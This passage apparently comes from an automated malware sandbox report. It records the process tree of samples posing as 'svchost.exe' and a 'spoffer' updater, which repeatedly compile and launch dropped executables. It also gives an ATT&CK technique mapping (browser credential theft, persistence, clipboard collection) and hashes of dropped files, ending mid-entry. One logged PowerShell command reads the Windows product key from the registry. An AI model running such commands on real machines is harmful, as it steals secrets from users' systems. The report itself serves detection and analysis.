      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:2968
- C:\Users\Admin\AppData\Local\Temp\RarSFX7\RunAsHelper.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX7\RunAsHelper.exe"
  2⤵
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  PID:1944

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\spofferupdate\spoffer_update.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\spofferupdate\spoffer_update.exe"
1⤵
PID:388

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\svhost\svchost.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\svhost\svchost.exe"
1⤵
PID:2768
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j41ksfl2\j41ksfl2.cmdline"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2692
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7382.tmp" "c:\Users\Admin\AppData\Local\Temp\j41ksfl2\CSC255440ECF7F94A06896FB7D3EB5416.TMP"
    3⤵
    PID:1544
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  PID:5460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jolwn1xz\jolwn1xz.cmdline"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:244
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES225F.tmp" "c:\Users\Admin\AppData\Local\Temp\jolwn1xz\CSCE32B2C43EE0143FD8AE4F31DDCE696F3.TMP"
      4⤵
      PID:4228
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:224
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0sqcb22p\0sqcb22p.cmdline"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4056
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES419F.tmp" "c:\Users\Admin\AppData\Local\Temp\0sqcb22p\CSC9C92DA3871C2444F8A996DB20E9AD32.TMP"
        5⤵
        
        PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:5516
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5unowilb\5unowilb.cmdline"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6048
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58E1.tmp" "c:\Users\Admin\AppData\Local\Temp\5unowilb\CSC787780014C1C48B39BA6E5F8E6CED164.TMP"
        6⤵
        
        PID:996
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Executes dropped EXE
        
        PID:5556
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mldc3yhw\mldc3yhw.cmdline"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2292
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CF1.tmp" "c:\Users\Admin\AppData\Local\Temp\mldc3yhw\CSCECE4346A2BE346CCA3C18B4F36E6A437.TMP"
        7⤵
        
        PID:5352
      - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        Executes dropped EXE
        
        PID:4852
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\um1bcagl\um1bcagl.cmdline"
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5656
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD285.tmp" "c:\Users\Admin\AppData\Local\Temp\um1bcagl\CSCDDC75EC459CA4FA9A09F591B59799BC3.TMP"
        8⤵
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        7⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gesh3kym\gesh3kym.cmdline"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4800
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBBD.tmp" "c:\Users\Admin\AppData\Local\Temp\gesh3kym\CSC98D1EC273B014E3CB04D72E5DAFDB28.TMP"
        9⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        8⤵
        Executes dropped EXE
        
        PID:5100
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2whuwm1j\2whuwm1j.cmdline"
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5240
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE15A.tmp" "c:\Users\Admin\AppData\Local\Temp\2whuwm1j\CSC6BCE122081634CB792C7AE7275B2727.TMP"
        10⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:752
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\verep3wp\verep3wp.cmdline"
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:652
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBDA.tmp" "c:\Users\Admin\AppData\Local\Temp\verep3wp\CSCCA12538192794F22A83F4DB8895470A1.TMP"
        11⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        10⤵
        Executes dropped EXE
        
        PID:3692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk0qxkly\tk0qxkly.cmdline"
        11⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4056
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5DC.tmp" "c:\Users\Admin\AppData\Local\Temp\tk0qxkly\CSC70110657204E2FAB44D361F0D18F76.TMP"
        12⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        11⤵
        Executes dropped EXE
        
        PID:940
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x01j3fts\x01j3fts.cmdline"
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5024
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES151C.tmp" "c:\Users\Admin\AppData\Local\Temp\x01j3fts\CSC45912E0929F44A6D96A846F96B6C67.TMP"
        13⤵
        
        PID:5480

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\svhost\svhost.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\svhost\svhost.exe"
1⤵
PID:1352
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w1bx44uq\w1bx44uq.cmdline"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:5204
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D94.tmp" "c:\Users\Admin\AppData\Local\Temp\w1bx44uq\CSC6B5A2C2EB8154726AAC6802A614BDEF6.TMP"
    3⤵
    PID:3028
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  PID:1264
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mesxvnak\mesxvnak.cmdline"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5392
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8852.tmp" "c:\Users\Admin\AppData\Local\Temp\mesxvnak\CSC35880AE54A474940A1F1C0223D58FA16.TMP"
      4⤵
      PID:5452
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:3580
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\psv00sdy\psv00sdy.cmdline"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4384
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38F5.tmp" "c:\Users\Admin\AppData\Local\Temp\psv00sdy\CSCDD4CC662E3364ADA9AC3EED6C5C951BF.TMP"
        5⤵
        
        PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:928
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2koiefme\2koiefme.cmdline"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3104
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3FFA.tmp" "c:\Users\Admin\AppData\Local\Temp\2koiefme\CSC742975F2739D4808A0491F4592CEE0.TMP"
        6⤵
        
        PID:4840
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3596
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3kxj4lla\3kxj4lla.cmdline"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49FC.tmp" "c:\Users\Admin\AppData\Local\Temp\3kxj4lla\CSC2067D21239C847B1B988EAA9540CC1B.TMP"
        7⤵
        
        PID:1476
      - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        Executes dropped EXE
        
        PID:2652
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qldofuxg\qldofuxg.cmdline"
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2212
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FB9.tmp" "c:\Users\Admin\AppData\Local\Temp\qldofuxg\CSCAAE131586D34E8FB5A2E3C43D3D36D.TMP"
        8⤵
        
        PID:660
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        7⤵
        Executes dropped EXE
        
        PID:3760
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccynuj0a\ccynuj0a.cmdline"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84E2.tmp" "c:\Users\Admin\AppData\Local\Temp\ccynuj0a\CSC74F32F0642A343A2889A4130BA86F165.TMP"
        9⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        8⤵
        Executes dropped EXE
        
        PID:3564
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fnnbgj2e\fnnbgj2e.cmdline"
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEBF.tmp" "c:\Users\Admin\AppData\Local\Temp\fnnbgj2e\CSC982539A6A74A48FC9A84A0C66198CEF.TMP"
        10⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:5684
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4avz5qna\4avz5qna.cmdline"
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5280
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD072.tmp" "c:\Users\Admin\AppData\Local\Temp\4avz5qna\CSCA5CF98CC4B114B8D97BFB382EE37FD6A.TMP"
        11⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        10⤵
        Executes dropped EXE
        
        PID:5508
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcxcp12l\lcxcp12l.cmdline"
        11⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3056
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE513.tmp" "c:\Users\Admin\AppData\Local\Temp\lcxcp12l\CSC558916504E5E482794F4C024157AD573.TMP"
        12⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        11⤵
        Executes dropped EXE
        
        PID:412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xumotkg2\xumotkg2.cmdline"
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF743.tmp" "c:\Users\Admin\AppData\Local\Temp\xumotkg2\CSC83D2A6143D43467DAE46DFAE41B8FB4E.TMP"
        13⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        12⤵
        Executes dropped EXE
        
        PID:3504
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qofh1awl\qofh1awl.cmdline"
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2356
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A09.tmp" "c:\Users\Admin\AppData\Local\Temp\qofh1awl\CSCB937A46C344A4162A142E0DF5AFFCCC.TMP"
        14⤵
        
        PID:5384

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\updatespoffer\Spoffer_Update.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\updatespoffer\Spoffer_Update.exe"
1⤵
PID:5868
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mogj0sso\mogj0sso.cmdline"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4400
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB1C.tmp" "c:\Users\Admin\AppData\Local\Temp\mogj0sso\CSC70B857DC1FC7472FB2F1313390877A9.TMP"
    3⤵
    PID:4228
- C:\Users\Admin\AppData\Local\Temp\spoffer_update.exe
  "C:\Users\Admin\AppData\Local\Temp\spoffer_update.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4464

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\spofferupdate\spoffer_update.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\spofferupdate\spoffer_update.exe"
1⤵
PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5a8213.rbs

Filesize
7KB

MD5
6d7aa51f9c80d6a34c2c3eb9b898df05

SHA1
4162a3c1098c857c129b396809984d66c6c058e9

SHA256
b2ee948d70c63b3f84967360ab2e6b5e613fb5304211bf7e27fdf7676c4ff03e

SHA512
efc9441aa342bb019ba77a4f93c554b42dd86f058c462a9ff459448deebfba74a776c9a3dbd99b86398ef9d294f9e20818a4a73952e9a28a8a5c5c6bc11a6c27

Download Submit
C:\Program Files (x86)\WAN Host\wanhost.exe

Filesize
203KB

MD5
37eec0ec7f112d4f51ccea83c70e7572

SHA1
7b75e11de811a3008b85dbaac8ef6d8003e84f81

SHA256
f068cde1b80e9acc6043f24115c61b71d9badd63535ba1e08f8ea41fc378be67

SHA512
e46f02c2251d5347d8a0c2d1b64ec725a0cb600b9d2e276b38f2d3aa835b03c8b2689f281aeccdbf7be81a0133ead5fd1c3fb91d274727317c98f1f5ad396641

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svhost.exe.log

Filesize
4KB

MD5
3f25c675a1bbd5750612084c359b8721

SHA1
9a637a60d9d795894b12dcedf53e2bfa051d97ff

SHA256
470c1b960140f5f4a281b23363a3234802d12c8699163f5b731c47ce8b53ad81

SHA512
ee9041f744fa6536298d155a59891da0fc678cde1331bf8fd6a3bca9159146ae2a4e9280db4f8c2d36778ba527e6c3027b77e56ea4c4eabb24fd73f7b0e9ce54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\015qbyjk\015qbyjk.dll

Filesize
3KB

MD5
ca380861a4a919d6de935f7bf0634d91

SHA1
0e63350bd3debc51ffa124cb3f44e37eec6e3563

SHA256
5059afb1580b00fc15085e90700ff5cf67e0ef4728c29536837d1b9ec680e0a9

SHA512
d899ca0cf06f8072fa19f85236e545e1d4de65f201d8bb4ae8f9b35660215f8f1281361a7711c1743a28e8f977f518ab9fe694d655c85194d1756814ad24b824

Download Submit
C:\Users\Admin\AppData\Local\Temp\3tbik3bq\3tbik3bq.dll

Filesize
3KB

MD5
e316a5bd8edd59be675ce1b9dc66b8dd

SHA1
870bc4a75e403642d48fb6cfa5aa544679208fa7

SHA256
f8495c8fc57c80bd3e8b6635b5ef1463cddfa3dafca6c34c535c54c573328a67

SHA512
d0e05003460687687d0fdde04df347d6dd49d5c6cd94eb8f4fd8a3c5d5db4d38751a03b4aa76cf8886a38d5a7089d50a17061172c685b8493b8cb1087574cbe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\3xnDCVwbbF.tmp

Filesize
20KB

MD5
4aeb9462918a1091fcdc09dcaa920951

SHA1
542b303e5bcda8985892f54633d577609e01ecb3

SHA256
32705a7992d5930e1854938891ce7e7bcd4f5cb9b6294c4e1e43a24620b930b9

SHA512
23f74ddbdc26e54b8b4e7600e1f512c98f65e236a92cf3f132c32d9ed714c780902d75fea9dd1037a1a77e4a4f06d058c704a6096a42d30a930a8da377eca4c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7vRdeQV9jp.tmp

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\H0MRe6nZFJ.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
